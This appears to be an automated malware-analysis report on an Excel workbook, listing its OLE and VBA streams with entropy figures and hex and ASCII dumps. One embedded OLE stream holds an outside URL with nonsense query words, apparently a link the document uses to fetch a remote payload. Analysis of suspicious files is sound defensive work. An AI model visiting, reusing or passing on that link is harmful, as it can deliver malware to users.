                                                                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 7b 32 2b c7 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Attribute VB_Name = "Sheet3"
                                                                          Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                          Attribute VB_GlobalNameSpace = False
                                                                          Attribute VB_Creatable = False
                                                                          Attribute VB_PredeclaredId = True
                                                                          Attribute VB_Exposed = True
                                                                          Attribute VB_TemplateDerived = False
                                                                          Attribute VB_Customizable = True
                                                                          

                                                                          General
                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                          VBA File Name:ThisWorkbook.cls
                                                                          Stream Size:985
                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . { 2 s . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . -
                                                                          Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 7b 32 73 d1 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Attribute VB_Name = "ThisWorkbook"
                                                                          Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                          Attribute VB_GlobalNameSpace = False
                                                                          Attribute VB_Creatable = False
                                                                          Attribute VB_PredeclaredId = True
                                                                          Attribute VB_Exposed = True
                                                                          Attribute VB_TemplateDerived = False
                                                                          Attribute VB_Customizable = True
                                                                          

                                                                          General
                                                                          Stream Path:\x1CompObj
                                                                          CLSID:
                                                                          File Type:data
                                                                          Stream Size:114
                                                                          Entropy:4.25248375192737
                                                                          Base64 Encoded:True
                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          General
                                                                          Stream Path:\x5DocumentSummaryInformation
                                                                          CLSID:
                                                                          File Type:data
                                                                          Stream Size:244
                                                                          Entropy:2.889430592781307
                                                                          Base64 Encoded:False
                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                          General
                                                                          Stream Path:\x5SummaryInformation
                                                                          CLSID:
                                                                          File Type:data
                                                                          Stream Size:200
                                                                          Entropy:3.2920681057018664
                                                                          Base64 Encoded:False
                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . P ; _ . . . . . . . . .
                                                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                          General
                                                                          Stream Path:MBD006B2059/\x1CompObj
                                                                          CLSID:
                                                                          File Type:data
                                                                          Stream Size:99
                                                                          Entropy:3.631242196770981
                                                                          Base64 Encoded:False
                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          General
                                                                          Stream Path:MBD006B2059/Package
                                                                          CLSID:
                                                                          File Type:Microsoft Excel 2007+
                                                                          Stream Size:9691
                                                                          Entropy:6.95011635744162
                                                                          Base64 Encoded:True
                                                                          Data ASCII:P K . . . . . . . . . . ! . . . . = . . . F . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                          Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 ab 0b 0d 1f 3d 01 00 00 46 03 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          General
                                                                          Stream Path:MBD006B205A/\x1Ole
                                                                          CLSID:
                                                                          File Type:data
                                                                          Stream Size:792
                                                                          Entropy:5.096125582120635
                                                                          Base64 Encoded:False
                                                                          Data ASCII:. . . . 8 # b . . . . . . . . . . . . " . . . y . . . K . . . . . h . t . t . p . s . : . / . / . s . t . 3 . . . p . r . o . / . Y . j . z . N . w . p . D . ? . & . s . l . o . p . e . = . n . e . e . d . y . & . r . o . b . e . r . t . = . g . r . o . t . e . s . q . u . e . & . c . r . e . s . t . = . f . r . a . g . i . l . e . & . a . g . r . e . e . m . e . n . . . 0 7 s u B ' 4 > . . . O b < " z . . . @ ` e t m . _ . I ] H . ! . L c ^ C G H K A . . 5 . S < . . . . . 4 . , E # : . e u . o * . . . . .
                                                                          Data Raw:01 00 00 02 e5 c5 38 23 e4 93 d4 62 00 00 00 00 00 00 00 00 00 00 00 00 22 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 1e 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 73 00 74 00 33 00 2e 00 70 00 72 00 6f 00 2f 00 59 00 6a 00 7a 00 4e 00 77 00 70 00 44 00 3f 00 26 00 73 00 6c 00 6f 00 70 00 65 00 3d 00 6e 00 65 00 65 00 64 00 79 00 26 00 72 00 6f 00 62 00
                                                                          General
                                                                          Stream Path:Workbook
                                                                          CLSID:
                                                                          File Type:Applesoft BASIC program data, first line number 16
                                                                          Stream Size:286554
                                                                          Entropy:7.998368154313615
                                                                          Base64 Encoded:True
                                                                          Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . - . W Y . \\ v , . # q p u I . | W _ b 5 . O _ o . . . . . . . . . . N . . . \\ . p . 8 & ' . @ " . . . V @ . B t l . 5 . L * ' . Q ) O ~ e 2 . . Y o F 1 F w d . I . i v . s 1 Q 3 . . 7 . u . P . A . m K . : / B . . . 2 a . . . . . . = . . . . V . . . . . . . T E l y . ` . . . . G . . . . . . . . . . . . . [ . . . . . . . = . . . . . . S . , . C . . @ . . . | . . . . . " . . . . . . . c . . . . . . . . 1 . . . * . H u a . . n w 4 u i . . \\ 1 . . . . 5 .
                                                                          Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 ca 98 e9 2d 0e 57 59 9d e1 10 5c ae da c7 76 d5 2c 12 e4 23 eb 71 70 fb d4 75 49 09 c0 7c bd 57 5f 62 cb 35 d2 0c f6 4f 5f 6f 1e b3 d1 a3 11 e9 e1 00 02 00 b0 04 c1 00 02 00 88 4e e2 00 00 00 5c 00 70 00 38 26 27 2e 40 22 de 06 1e b2 1b 56 40 d3 0c 42 74 6c d2 a1 b7 35 dd f9 89 d3 b9 8a 84 b5
                                                                          General
                                                                          Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                          CLSID:
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Stream Size:525
                                                                          Entropy:5.25184623251135
                                                                          Base64 Encoded:True
                                                                          Data ASCII:I D = " { 7 3 7 C B F F C - 7 F F 9 - 4 2 8 2 - 9 C 3 0 - 5 0 9 4 0 5 F 5 0 4 8 7 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " F 3 F 1 2 2 A 9 8 9 A D 8 9 A D 8
                                                                          Data Raw:49 44 3d 22 7b 37 33 37 43 42 46 46 43 2d 37 46 46 39 2d 34 32 38 32 2d 39 43 33 30 2d 35 30 39 34 30 35 46 35 30 34 38 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                                          General
                                                                          Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                          CLSID:
                                                                          File Type:data
                                                                          Stream Size:104
                                                                          Entropy:3.0488640812019017
                                                                          Base64 Encoded:False
                                                                          Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                          Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                                          General
                                                                          Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                          CLSID:
                                                                          File Type:data
                                                                          Stream Size:2644
                                                                          Entropy:3.992761578606274
                                                                          Base64 Encoded:False
                                                                          Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\